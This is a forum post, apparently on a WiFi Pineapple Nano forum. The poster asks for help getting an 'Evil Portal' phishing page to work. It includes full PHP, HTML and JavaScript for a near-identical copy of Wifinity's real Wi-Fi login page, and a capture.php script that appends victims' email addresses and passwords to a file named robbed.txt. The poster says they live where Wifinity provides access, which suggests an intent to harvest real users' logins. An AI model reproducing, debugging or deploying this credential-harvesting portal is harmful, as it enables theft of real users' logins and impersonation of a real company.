gibsta8570
-
Posts
3 -
Joined
-
Last visited
Posts posted by gibsta8570
-
-
Hi.. This is my first post so go easy please..!
I've never had to ask a question on a forum before because I've always found that another of the 7 billion peeps on the planet has already asked it and normally that question has been answered, helpfully, by a number of people. From there I've always been able to work out what it is I need to do in order to get what it is I'm doing working.Not this time.. I've only had my Pineapple Nano just over a week but I've spent at least 2 to 3 hours a night trying to get my Evil Portal page working. So I'm swallowing my pride and asking for help. I'm also preparing for the ripping apart of my html / php / js code. I don't know php or javascript. What I've written is cobbled together from reading what other people have posted (and been helped to correct) and from videos. I will be doing the codecademy PHP and JavaScript courses over the next few weeks.
I don't think there is much wrong with my code. It's obviously not right or it would be working perfectly but it almost is..
I think my one issue is the location of the various files.
I have the following files saved in /root/portals/WifinityPortal
MyPortal.php - Produced by the module, not touched it.
WifinityPortal.ep - Produced by the module, not touched.
capture.php - Produced using sublime (with much help from jermzz's post). Code below.
index.php - Produced using sublime (with help taken from everywhere) then scp'd to the Nano to overwrite the original. Code below.
jquery-2.2.1.min.js
topleftlogo.png - Image file which is displayed fine.
robbed.txt - This file is located in /www permanently. Permissions are set to -rwxrw-rw-
All of the files become available in the /www directory when I activate the Portal using the Evil Portal module control page.
I've tried moving the robbed.txt and capture.php files around to eliminate the PineAP being funny about allowing access to them. As you'll be able to see in my code, I've tried different ways of submitting the credentials to the capture.php page. I've tried cutting out index.php and just having an html doc there, or pasting the contents of my index.html into the PineAP Configuration page's Landing Page box. I've tried everything I can think of, many many times.. I'm a little confused as to where jermzz and kingoddball has their splash.html document. When I used an index.html instead of index.php users where not authenticated.
Currently (with the files located as listed above), when a user connects (iOS) or tries to browse (any other device), the portal page is displayed. Entering email address and password causes the user's IP address to appear in the Evil Portal Authorised Clients list however the user is displayed the portal page a second time. Trying to load the original webpage that invoked the portal page doesn't work but loading a different page works. From what I've read, this is a known bug and is being working on.. The positive is that the page/module authorisation works, mostly. However, I still can't get the capture.php to write to the robbed.txt file.
If anyone can advise on their working solution of file names and locations.. And if anyone is able to scan down my code and spot any glaring errors.. I would be very very grateful. In return you get an almost working (carbon copy looking) version of Wifinity Inc.'s login page. Wifinity provide wifi based internet access in the accommodation block where I live; and also a rapidly increasing number of campuses, hotels, conference centres etc.. Although using the page for the purposes of stealing actual login credentials and thus allowing yourself free internet access would indeed be highly immoral! And there's some thing called the the law? Printed on vellum it is don't you know!
index.php
<?php $destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . ""; ?> <!-- <!DOCTYPE html> --> <HTML> <HEAD> <title>Wifinity | Login Page</title> <!-- LINK TO CSS FILE - COMMENTED OUT AND CONTENTS COPIED (TO BELOW) DUE TO EVIL PORTAL CSS ISSUE <link type="text/css" rel="stylesheet" href="wifinity.css"/> --> <style type="text/css"> body{ background-color: #E4E3E2; font-family: Elido Light, Open Sans, Helvetica, Arial, Sans-serif; } #top_logo_banner{ border: none; ; margin-right: -6px; margin-top: -10px; display: block; background-color: #FFFFFF; height: 72px; line-height: 100px; min-width: 100%; } #top_left_logo{ width: 158px; height: 38px; margin-left: 10%; margin-top: 20px; } #center_login_box{ background-color: #FFFFFF; border: 1px solid #CDCCCB; margin-top: 30px; margin-left: 20%; margin-right: 20%; height: 380px; } #invisible_center_box{ border: none; width: 80%; height: 90%; margin-left: 10%; } .login_box_title{ font-weight: normal; font-size: 1.6em; } label{ font-weight: normal; font-size: 1em; } #emailaddress{ height:40px; width: 98%; } #password{ height:40px; width: 98%; } #submitbutton{ background-color: #6FAE23; text-decoration: none; color: #FFFFFF; border: none; border-radius: 5px; height: 48px; width: 100%; font-size: 15px; text-transform: uppercase; padding: 0 20px; } #submitbutton:hover{ background-color: #61991F; border-color: #61991F; text-decoration: none; } .grey_buttons{ width:50%; } .footer_text{ text-align: center; font-size: 1em; color: #888887; } </style> <script type="text/javascript"> function redirect() { user_email = document.getElementById("emailaddress").value; user_password = document.getElementById("password").value; user_credentials = user_email + " - " + user_password; window.location = "/capture.php?user_credentials=" + user_credentials; } </script> <!-- ORIGINAL redirect() JAVASCRIPT FUNTION WITH TIMEOUT() FUNCTION - CREATED BY EVIL PORTAL MODULE <script type="text/javascript"> function redirect() { setTimeout(function(){window.location = "/captiveportal/index.php";},100);} </script> --> <!-- FUNCTIONS FOR CAPTURE AND REDIRECT MODIFIED FROM jermzz's HAK5 FORUM POST ON TRHEAD: https://forums.hak5.org/index.php?/topic/37546-evil-ap-portal-help-required-does-not-capture-data/ <script type="text/javascript"> function getUrlVars(){ var vars = {}; var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value) { vars[key] = value; }); return vars; } var fvalsubmit = getUrlVars()["valsubmit"]; if (fvalsubmit == 1) { window.location = "$authtarget"; } function capture_credentials() { user_email = document.getElementById("emailaddress").value; user_password = document.getElementById("password").value; user_credentials = user_email + " - " + user_password; window.location = "http://172.16.42.1/capture.php?user_credentials=" + user_credentials + "&redir=$authtarget&valsubmit=1"; } </script> --> </HEAD> <BODY> <div id="top_logo_banner"> <img id="top_left_logo" src="topleftlogo.png"/> </div> <div id="center_login_box"> <div id="invisible_center_box"> <p class="login_box_title">Log in</p> <form id="credentialsform" method="POST" action="/captiveportal/index.php" onsubmit="redirect()"> <input type="hidden" name="target" value="<?=$destination?>"> <!-- MY OPENING FORM TAG - USED WHEN CALLING capture_credentials() FUNCTION USING onclick OF BUTTON (NOT onsubmit OF FORM) <form id="credentialsform"> --> <p> <label for="emailaddress">Email Address</label> </p> <p> <input type="text" name="emailaddress" id="emailaddress" placeholder="email@example.com" required> </p> <p> <label for="password">Password</label> </p> <p> <input type="password" name="password" id="password" placeholder="Password" required> </p> <p> <button type="submit" id="submitbutton"> <b>LOG IN</b> </button> <!-- MY ORIGINAL SUBMIT BUTTON FOR USE WITH capture_credentials() FUNCTION <button type="button" id="submitbutton" onclick="capture_credentials()"> <b>LOG IN</b> </button> --> </p> <p> <button class="grey_buttons">Refresh location</button><button class="grey_buttons">Reset password</button> </p> </form> </div> </div> <div> <p class="footer_text">© Copyright 2016 Wifinity | All rights reserved</p> </div> </BODY> <!-- BELOW IS ORIGINAL CONTENTS OF index.php PRODUCED BY EVIL PORTAL MODULE <?php $destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . ""; ?> <HTML> <HEAD> <title>Evil Portal</title> <script type="text/javascript"> function redirect() { setTimeout(function(){window.location = "/captiveportal/index.php";},100);} </script> </HEAD> <BODY> <center> <h1>Evil Portal</h1> <p>This is the default Evil Portal page</p> <form method="POST" action="/captiveportal/index.php" onsubmit="redirect()"> <input type="hidden" name="target" value="<?=$destination?>"> <button type="submit">Authorize</button> </form> </center> </BODY> </HTML> --> </HTML>capture.php
<?php $user_credentials = $_GET["user_credentials"]; $redir = $_GET["redir"]; $file = fopen("robbed.txt", "a"); $fwrite($file, $user_credentials . "\n"); fclose($file); echo '<script type="text/javascript">window.location = "/captiveportal/index.php"</script>'; ?>Apologies for being such a newb and rambling so much.. Any advice on how to get the credentials writing to the robbed.txt will be very thankfully received. Getting it working 100% will gladly wait until Evil Portal is updated.
-
1
-
I've never had to ask a question on a forum before because I've always found that another of the 7 billion peeps on the planet has already asked it and normally that question has been answered, helpfully, by a number of people. From there I've always been able to work out what it is I need to do in order to get what it is I'm doing working.
Landing Page / Evil Portal - Capture data
in WiFi Pineapple NANO
Posted
I'm still scratching my head over trying to get the username and password written to the .txt file.
Cheers Seb, it's good to have confirmation that it can work and I'm not wasting my time... I will make it work!